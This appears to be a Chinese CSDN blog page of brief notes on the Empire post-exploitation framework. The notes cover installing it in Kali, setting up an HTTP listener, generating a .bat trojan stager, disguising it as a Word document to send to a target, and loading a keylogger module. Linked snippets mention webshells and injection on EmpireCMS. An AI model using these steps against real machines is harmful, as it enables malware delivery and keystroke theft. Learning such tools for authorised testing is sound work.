笔记。。。

最新推荐文章于 2023-11-24 19:36:12 发布
最新推荐文章于 2023-11-24 19:36:12 发布
阅读量58 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kass_Hersch/article/details/124871462
版权

1.1.在window中通过网站下载

Releases · EmpireProject/Empire · GitHub

 

1.2.在 kali中直接下载

下载命令:git clone https://github.com/BC-SECURITY/Empire

 

注意:root账号下执行该命令

 

 

 

查看python环境

 

输入python、python2命令进行查看,exit()退出

 

 

 

1.3.在kali中通过powershell进行下载

帝国下载:sudo  apt install powrshell-empire

 

 开启服务:powershell-empire  server

 

 

 

 

 

 开启客户端:powershell-empire  client

 

  ​​

 

 

 

 

2.1.监听http

输入命令:listeners  进入监听界面

 

 

 

                uselistener http  进入http监听模式

 

 

 

 2.2.查看虚拟机ip

输入:ipconfig进行查看 

 

 

 

2.3.设置监听 

1.set  Name text1  设置一个监听

 

2.set  Host  你要监听的ip地址/9999

 

3.set  Port 9999

 

4.execute 回到监听页面

 

 

 

2.4.木马

1.生成bat类型的木马

输入命令:uselistener

 

                  usestager windows/launcher_bat 

 

 

 

set Listener text1 设置你想使用的监听路线

 

 

 

把生成的木马发送到主机上,bat可以使用word进行伪装。

 

2.监听键盘

命令:usemodule powershell/collection/keylogger

kass_Hersch
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全攻防之帝国
jxy191021的博客
05-19 541
1.如何下载帝国 1.1.在window中通过网站下载 Releases · EmpireProject/Empire · GitHub 1.2.在kali中直接下载 下载命令:git clone https://github.com/BC-SECURITY/Empire 注意:root账号下执行该命令 查看python环境 输入python、python2命令进行查看,exit()退出 1.3.在kali中通过powershell进行下载 1.开启服务 帝国下载:sudo ..
EmpireCMS4.5 渗透测试及靶场搭建(漏洞复现)
Continuejww的博客
08-30 2079
成功在网站根目录写入webshell连接蚁剑目录遍历图片内的栏目信息全部都含有如上图的xss漏洞。
快速查看ip
xxsp9999的博客
03-28 297
windows dos查看IP地址命令:ipconfiglinux 查看ip地址命令:ifconfig
内网渗透之隐藏通信隧道技术
qq_48904485的博客
04-27 5177
一、隐藏通信隧道基础知识 1、隐藏通信隧道概述 一般的网络通信,先在两台机器之间建立TCP连接,然后进行正常的数据通信。在知道IP地址的情况下,可以直接发送报文;如果不知道IP地址,就需要将域名解析成IP地址。在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至人侵检测系统来检查对外连接的情况,如果发现异常,就会对通信进行阻断。 这里的隧道,是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据
121.网络安全渗透测试—[CMS后台 getwebshell]—[帝国empirecms6.6后台 getwebshell]
qwsn
07-10 2147
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 登录后台---->栏目---->自定义页面---->增加自定义页面---->填写页面名称为webshell.php(随便)---->文件名默认是…/…/page.html---->文件内容为以下内容:功能是创建shell.php文件并写入一句话到shell.php文件中 栏目---->自定义页面---->管理自定义页面---->点击刚刚的page.html页面触发webshell(其实就是访问http://www.empirecm
笔记
weixin_37260876的博客
07-21 140
MIMO雷达成像算法研究 https://wenku.baidu.com/view/6b4de1df6f1aff00bed51e66.html?pn=151 合成孔径雷达 https://max.book118.com/html/2017/0523/108465523.shtm 使用卷积神经网络的多普勒雷达手势识别 http://www.sohu.com/a/203306961_4659...
java超强笔记
12-03
"Java超强笔记"正是一份专为新手准备的学习资源,它全面涵盖了从Java环境的搭建到软件设计的各种概念,旨在提供一个易读且系统的学习路径。 首先,笔记可能会从Java的起源和发展开始介绍,让你了解这门语言的历史...
冰河的渗透实战笔记-冰河.pdf
05-18
冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
javaweb项目实(含笔记与详细实现步骤)
07-20
JavaWeb项目实(含笔记与详细实现步骤) JavaWeb是一种基于Java技术的Web应用程序开发框架,它涵盖了服务器端编程、数据库交互、用户界面设计等多个方面。对于初学者来说,掌握JavaWeb开发是步入Web开发领域的关键...
狂神说笔记大全.rar
11-25
狂神的笔记
javase笔记
01-24
javase笔记,非常有用的java学习资料,多年积累的java
渗透测试之常见的cms以及对应cms的历史漏洞
最新发布
2301_79441074的博客
11-24 147
判断出目标网站的CMS能够提高渗透的效率,知道具体的CMS后,可以查到历史的CMS漏洞,可以节省大量的信息收集时间,提高渗透测试效率。3.门户建站系统:DedeCMS(织梦)、帝国CMS、PHPCMS、动易、cmstop等;1. 企业建站系统:MetInfo(米拓)、蝉知、SiteServer CMS等;2.B2C商城系统:商派shopex、ecshop、hishop、xpshop等;12.电影网站系统:苹果cms、ctcms、movcms等;9.人才招聘网站系统:骑士CMS、PHP云人才管理系统;
渗透测试-地基篇-Webshell-帝国cms框架(九)
qq_34801745的博客
11-25 1171
** 渗透测试-地基篇-Webshell-帝国cms框架(九) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定你
网站安全检测 对帝国CMS代码的后台功能性安全测试
网站安全资讯
09-09 613
撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>> ...
渗透测试之网站cms识别大法汇总
热门推荐
白帽子九一
04-13 1万+
云悉相信大家都知道,但其库总有限。再给大家介绍kali自带的一款工具— whatweb 一、安装命令: apt-get insatll whatweb 二、用法: 1、扫描单个目标 whatweb www.xxx.com 2、扫描多个目标,并将结果保存在txt 新建xxx文件,输入多个目标地址,保存 whatweb -i xxx --log-brief=111.txt ......
网络渗透之帝国
S1942177831的博客
05-19 194
1.下载帝国的三个方法 1.1 window中通过网站下载Releases · EmpireProject/Empire · GitHub 使用empire2.5版本,不是所有电脑都适用(kali) 1.2 kali中直接下载 (root账号下执行命令) git clone https://github.com/BC-SECURITY/Empire #下载帝国 cd Empire 查看python环境 python python2 exit()退出python环境 1....
帝国CMS系统最新注入漏洞来入侵-启示
就这点散事-工作笔记
04-15 2973
一、热身在 介绍这个漏洞之前,有必要先明白一个概念——宽字节注入。宽字节注入是相对于单字节注入而言的。单字节注入就是大家平时的直接在带有参数ID的URL后面 追回SQL语句进行注入。比如:http://www.hackest.cn/article.php?id=1 and 1=1/*http://www.hackest.cn/article.php?id=1 and 1=2/*这个经典的判断目标是...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8330
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值